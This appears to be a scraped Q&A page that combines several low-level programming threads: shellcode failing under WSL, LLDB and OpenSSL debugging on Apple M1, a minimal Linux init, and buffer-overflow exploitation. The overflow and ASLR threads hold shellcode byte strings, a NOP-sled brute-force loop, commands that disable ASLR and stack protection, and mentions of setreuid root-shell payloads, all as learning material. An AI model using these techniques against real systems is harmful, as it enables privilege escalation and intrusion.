Unable to execute assembly code located in the program's data segment in WSL - c

This program overrides the return address of the main function to point to a character array of encoded x86-64 assembly instructions. The instructions simply encode a NOP followed by the syscall exit(1).
char shellcode[] = "\x90\x48\x31\xc0\x48\x89\xc7\x48\xff\xc7\x04\x3c\x0f\x05";
void main() {
long int *ret;
ret = (long int *)&ret + 2;
(*ret) = (long int)shellcode;
}
It is compiled with
gcc program.c -o program.exe -fno-stack-protector -z execstack
on a WSL. (The Ubuntu app from the Microsoft Store)
The -z execstack flag should cause the stack, as well as all other writable portions of the program, to be executable.
Since the global character array resides in the .data of the assembly code it should be executable. This is true when running the program on a Linux VM, but apparently not on the WSL? On WSL, control is still properly redirected to the NOP, but it segfaults if you try to execute that instruction (presumably on code-fetch from a non-executable page). Running gdb shows this after returning from main:
=> 0x8004010 <shellcode>: nop
0x8004011 <shellcode+1>: xor %rax,%rax
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
What could be causing this inconsistency between WSL and real Linux? Does WSL enforce strict W^X, overriding even -z execstack?
Are other Windows security features at play? I do not know if it is a WSL 1 or 2, but the uname -a output is:
Linux LAPTOP-M91FQN9V 4.4.0-18362-Microsoft #836-Microsoft Mon May 05 16:04:00 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
What could be preventing the instructions from running, when the same does not occur on a Linux VM?

Related

Macbook M1 assembly lldb displays only 3 source lines then switches to object code display

First attempt at ARM64 (apple M1) assembly coding. Have basic 'hello world' code which assembles and runs correctly but when I run it in lldb, only the first three lines are displayed in full source code format like this:
Abenaki:hello jiml$ ~/llvm/clang+llvm-15.0.2-arm64-apple-darwin21.0/bin/lldb hello
(lldb) target create "hello"
Current executable set to '/Users/jiml/Projects/GitRepos/ARM/hello/hello/hello/hello' (arm64).
(lldb) b main
Breakpoint 1: where = hello`main + 4, address = 0x0000000100003f7c
(lldb) r
Process 5017 launched: '/Users/jiml/Projects/GitRepos/ARM/hello/hello/hello/hello' (arm64)
Process 5017 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100003f7c hello`main at hello.s:19
16
17 _main:
18 mov x0, #0x0 // stdout
-> 19 adrp x1, msg#PAGE // pointer to string
20 add x1, x1, msg#PAGEOFF
21 ldr x2, =msg_len // bytes to output
22 mov x16, #0x04 // sys_write
warning: This version of LLDB has no plugin for the language "assembler". Inspection of frame variables will be limited.
(lldb)
After three steps, the display reverts to bare object code like this:
(lldb) s
Process 5017 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step in
frame #0: 0x0000000100003f88 hello`main + 16
hello`main:
-> 0x100003f88 <+16>: mov x16, #0x4
0x100003f8c <+20>: svc #0x80
0x100003f90 <+24>: adrp x1, 1
0x100003f94 <+28>: mov x2, #0x0
dwarfdump -a shows that all source lines are present in the .o; same behavior for .dSYM assembly. Using the 'list' command in lldb however displays all source lines correctly.
Is this a known issue for LLVM (clang, lldb) development? Any help appreciated...
I have tried LLVM version 14 and 15, same behavior, searched for similar issues but no help.
I did find this https://stackoverflow.com/questions/73778648/why-is-it-that-assembling-linking-in-one-step-loses-debug-info-for-my-assembly-s but it did not solve my issue.
So I think I have this resolved but not sure if it is actual compiler bug.
I wrote hello world in C, compiled and confirmed complete source display in lldb. I then reran clang with -S to generate the assembler source.
I then assembled that source...
clang -g -c -o hello.o hello.s
clang -o hello hello.o -lSystem -arch arm64
and confirmed it also runs in lldb with complete source display. Then I moved my hand written code line-by-line in order to figure out where the problem occurs. Seems my string data and length calculation is problematic. In the data section I originally had:
msg: ascii "Hello ARM64\n"
msg_len = . - msg
Coming from Intel world this seems perfectly natural ;-) Adding that length calculation caused some sort of corruption of the debug data. However, the executable has a proper OSO statement pointing at hello.o (nm -ap hello) and further the object file has references for all source statements in the source file (dwarfdump --debug-line hello.o) but still doesn't display source code after the third step. Curious that 'source info -f hello.s' within lldb only listed four lines.
I found three work-arounds. First adding a label between the two statements seems to allow correct behavior:
msg: ascii "Hello ARM64\n"
nothing:
msg_len = . - msg
Second, using equate:
msg: ascii "Hello ARM64\n"
.equ msg_len, . - msg
Third, using two labels:
msg: ascii "Hello ARM64\n"
msg_end:
msg_len = msg_end - msg
Will file report with llvm and see what they say.

Why is LLDB generating EXC_BAD_INSTRUCTION with user compiled library on MacOS?

I want to debug OpenSSL on MacOS to see how it creates an elliptic curve point. So, I compiled OpenSSL with debug symbols and no optimizations. However, when I run with lldb, it doesn't work
$ cat ec.c
#include <crypto/ec.h>
#include <stdio.h>
int main() {
EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp384r1);
EC_POINT *point = EC_POINT_new(group);
printf("done!\n");
return 0;
}
Here is how I compiled and ran the program:
$ gcc ec.c -o ec -I../openssl/include ../openssl/libcrypto.dylib -ggdb3 -O0
$ DYLD_INSERT_LIBRARIES=../openssl/libcrypto.dylib ./ec
done!
Here is what happens when I run lldb and try to break at main:
$ lldb ./ec
(lldb) process launch --environment DYLD_INSERT_LIBRARIES=../openssl/libcrypto.dylib ./ec
Process 3948 launched: '/Users/seanthomas/repos/ec/ec' (arm64)
Process 3948 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_INSTRUCTION (code=1, subcode=0x4a03000)
frame #0: 0x00000001009651a8 libcrypto.3.dylib`_armv8_sve_probe
libcrypto.3.dylib`:
-> 0x1009651a8 <+0>: eor z0.d, z0.d, z0.d
0x1009651ac <+4>: ret
libcrypto.3.dylib`:
0x1009651b0 <+0>: xar z0.d, z0.d, z0.d, #0x20
0x1009651b4 <+4>: ret
Target 0: (ec) stopped.
(lldb)
Does anyone know how to fix this?
I'm not sure whether this can help you or not. But perhaps, there're bugs in libcrypto.3.dylib on Arm arch.
I met this problem also. It works when I run the program by cmd line in shell. But it meets this problem when I want to debug this program in VSCode using lldb.
How ever, when I delete the libcrypto.3.dylib and libssl.3.dylib, build the openssl using tag OpenSSL_1_1_1m, and rebuild the program. It works!
Yes, confirm the issue on Mac M1/M2. Reverted back to the old version of openssl and the problem got fixed. I use openssl lib in MacOs app of mine and on app launch in Debug mode it gets crashing right away.

Want to build bare Linux system that has only a kernel and one binary

I want to build a dedicated Linux system that only ever runs one binary program. This program takes control of the screen via the OpenGL driver and displays patterns. There needs to be keyboard input as well to configure the patterns. Since running this one program will be the sole purpose of the machine, I don't need any GUI, networking, etc. Also, I probably don't need any process scheduling in the kernel since only one process will ever run.
Is it possible to replace /sbin/init with my own binary to achieve this? After the kernel loads, it would then immediately execute my own binary, and that would run the entire time the machine was on. Basically, I want to emulate the way a microcontroller works, but with the benefit of being able to use an x86 CPU with different hardware devices and drivers.
Minimal init hello world program step-by-step
Compile a hello world without any dependencies that ends in an infinite loop. init.S:
.global _start
_start:
mov $1, %rax
mov $1, %rdi
mov $message, %rsi
mov $message_len, %rdx
syscall
jmp .
message: .ascii "FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR\n"
.equ message_len, . - message
We cannot use sys_exit, or else the kernel panics.
Then:
mkdir d
as --64 -o init.o init.S
ld -o init d/init.o
cd d
find . | cpio -o -H newc | gzip > ../rootfs.cpio.gz
ROOTFS_PATH="$(pwd)/../rootfs.cpio.gz"
This creates a filesystem with our hello world at /init, which is the first userland program that the kernel will run. We could also have added more files to d/ and they would be accessible from the /init program when the kernel runs.
Then cd into the Linux kernel tree, build is as usual, and run it in QEMU:
git clone git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
cd linux
git checkout v4.9
make mrproper
make defconfig
make -j"$(nproc)"
qemu-system-x86_64 -kernel arch/x86/boot/bzImage -initrd "$ROOTFS_PATH"
And you should see a line:
FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR
on the emulator screen! Note that it is not the last line, so you have to look a bit further up.
You can also use C programs if you link them statically:
#include <stdio.h>
#include <unistd.h>
int main() {
printf("FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR\n");
sleep(0xFFFFFFFF);
return 0;
}
with:
gcc -static init.c -o init
You can run on real hardware with a USB on /dev/sdX and:
make isoimage FDINITRD="$ROOTFS_PATH"
sudo dd if=arch/x86/boot/image.iso of=/dev/sdX
Great source on this subject: http://landley.net/writing/rootfs-howto.html It also explains how to use gen_initramfs_list.sh, which is a script from the Linux kernel source tree to help automate the process.
Next step: setup BusyBox so you can interact with the system through a shell. Buildroot is a great way to do it.
Tested on Ubuntu 16.10, QEMU 2.6.1.
It might be possible to replace /sbin/init by your program, but you should be aware that process 1 has some specific duties. So I think it is not advisable to replace it.
Remember that a Linux kernel can also start some processes magically, outside of the usual fork from a process inherited by the init process. I'm thinking of things like /sbin/modprobe or /sbin/hotplug etc.
Also, udev (or systemd) have some special roles. On some systems, fan control was related to such things (I really forgot the details). If unlucky, you could burn your hardware if fan is not working well (but AFAIK this is no more true on recent hardware).
By seeking with string the vmlinux in a recent 3.15.3 kernel, I find that it knows about:
/bin/init
/bin/sh
/sbin/request-key
/sbin/tomoyo-init
/sbin/modprobe
/sbin/poweroff
/sbin/hotplug
I would recommend instead keeping some existing init program, and configure it to run only your program.
You can put your program to initrd, and then run it from initrd's init.
Simply use a boot paramter eg) init=/bin/bash
init is the process 1, used by kernel to start user space, which as a few specific duties like reaping children periodical to clean out zombies. Sounds like you don't even need that.
Linux Boot parameters you should know

Buffer overflow works in gdb but not without it

I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output:
[root#localhost bufferoverflow]# gdb stack
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/bufferoverflow/stack...done.
(gdb) r
Starting program: /root/bufferoverflow/stack
process 6003 is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.2.i686
sh-4.1#
However when I run the program stack just on its own it seg faults. Why might this be?
Exploit development can lead to serious headaches if you don't adequately account for factors that introduce non-determinism into the debugging process. In particular, the stack addresses in the debugger may not match the addresses during normal execution. This artifact occurs because the operating system loader places both environment variables and program arguments before the beginning of the stack:
Since your vulnerable program does not take any arguments, the environment variables are likely the culprit. Mare sure they are the same in both invocations, in the shell and in the debugger. To this end, you can wrap your invocation in env:
env - /path/to/stack
And with the debugger:
env - gdb /path/to/stack
($) show env
LINES=24
COLUMNS=80
In the above example, there are two environment variables set by gdb, which you can further disable:
unset env LINES
unset env COLUMNS
Now show env should return an empty list. At this point, you can start the debugging process to find the absolute stack address you envision to jump to (e.g., 0xbffffa8b), and hardcode it into your exploit.
One further subtle but important detail: there's a difference between calling ./stack and /path/to/stack: since argv[0] holds the program exactly how you invoked it, you need to ensure equal invocation strings. That's why I used /path/to/stack in the above examples and not just ./stack and gdb stack.
When learning to exploit with memory safety vulnerabilities, I recommend to use the wrapper program below, which does the heavy lifting and ensures equal stack offsets:
$ invoke stack # just call the executable
$ invoke -d stack # run the executable in GDB
Here is the script:
#!/bin/sh
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$#"
else
exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$#"
fi
else
exec env - $env TERM=screen PWD=$PWD $prog "$#"
fi
Here is a straightforward way of running your program with identical stacks in the terminal and in gdb:
First, make sure your program is compiled without stack protection,
gcc -m32 -fno-stack-protector -z execstack -o shelltest shelltest.c -g
and and ASLR is disabled:
echo 0 > /proc/sys/kernel/randomize_va_space
NOTE: default value on my machine was 2, note yours before changing this.
Then run your program like so (terminal and gdb respectively):
env -i PWD="/root/Documents/MSec" SHELL="/bin/bash" SHLVL=0 /root/Documents/MSec/shelltest
env -i PWD="/root/Documents/MSec" SHELL="/bin/bash" SHLVL=0 gdb /root/Documents/MSec/shelltest
Within gdb, make sure to unset LINES and COLUMNS.
Note: I got those environment variables by playing around with a test program.
Those two runs will give you identical pointers to the top of the stack, so no need for remote script shenanigans if you're trying to exploit a binary hosted remotely.
The address of stack frame pointer when running the code in gdb is different from running it normally. So you may corrupt the return address right in gdb mode, but it may not right when running in normal mode. The main reason for that is the environment variables differ among the two situation.
As this is just a demo, you can change the victim code, and print the address of the buffer. Then change your return address to offset+address of buffer.
In reality, however,you need to guess the return address add NOP sled before your malicious code. And you may guess multiple times to get a correct address, as your guess may be incorrect.
Hope this can help you.
The reason your buffer overflow works under gdb and segfaults otherwise is that gdb disables address space layout randomization. I believe this was turned on by default in gdb version 7.
You can check this by running this command:
show disable-randomization
And set it with
set disable-randomization on
or
set disable-randomization off
I have tried the solution accepted here and It doesn't work (for me). I knew that gdb added environment variables and for that reason the stack address doesn't match, but even removing that variables I can't work my exploit without gdb (I also tried the script posted in the accepted solution).
But searching in the web I found other script that work for me: https://github.com/hellman/fixenv/blob/master/r.sh
The use is basically the same that script in the accepted solution:
r.sh gdb ./program [args] to run the program in gdb
r.sh ./program [args] to run the program without gdb
And this script works for me.
I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program... However when I run the program stack just on its own it seg faults.
You should also ensure FORTIFY_SOURCE is not affecting your results. The seg fault sounds like FORTIFY_SOURCE could be the issue because FORTIFY_SOURCE will insert "safer" function calls to guard against some types of buffer overflows. If the compiler can deduce destination buffer sizes, then the size is checked and abort() is called on a violation (i.e., your seg fault).
To turn off FORTIFY_SOURCE for testing, you should compile with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.
One of the main things that gdb does that doesnt happen outside gdb is zero memory. More than likely somewhere in the code you are not initializing your memory and it is getting garbage values. Gdb automatically clears all memory that you allocate hiding those types of errors.
For example: the following should work in gdb, but not outside it:
int main(){
int **temp = (int**)malloc(2*sizeof(int*)); //temp[0] and temp[1] are NULL in gdb, but not outside
if (temp[0] != NULL){
*temp[0] = 1; //segfault outside of gdb
}
return 0;
}
Try running your program under valgrind to see if it can detect this issue.
I think the best way works out for me is to attach the process of the binary with gdb and using setarch -R <binary> to temporarily disable the ASLR protection only for the binary. This way the stack frame should be the same within and without gdb.

ASLR brute force

I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64b computer and after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well know scenario chown root ./vul, chmod +s ./vul, shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...) and finally whoami that returns 'root' in the spawned shell).
That is quite strange since execstack -q ./vul tels me the executable stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32bits machine as you did not pass the option -m32 to gcc in order to get 32bits code.
Finally, I did run your program without success (I waited way more than a few seconds).
So, I'm a bit doubtful about your conclusion (except if you are running a very peculiar Linux system or may have been lucky).
Anyway, there are two main things that you have not mentionned:
Having a bug that offer an unlimited exploitation windows is quite rare.
Most of the modern systems run on amd64 (64bits) processors, which lower drastically the probability to hit the nop-zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.

Resources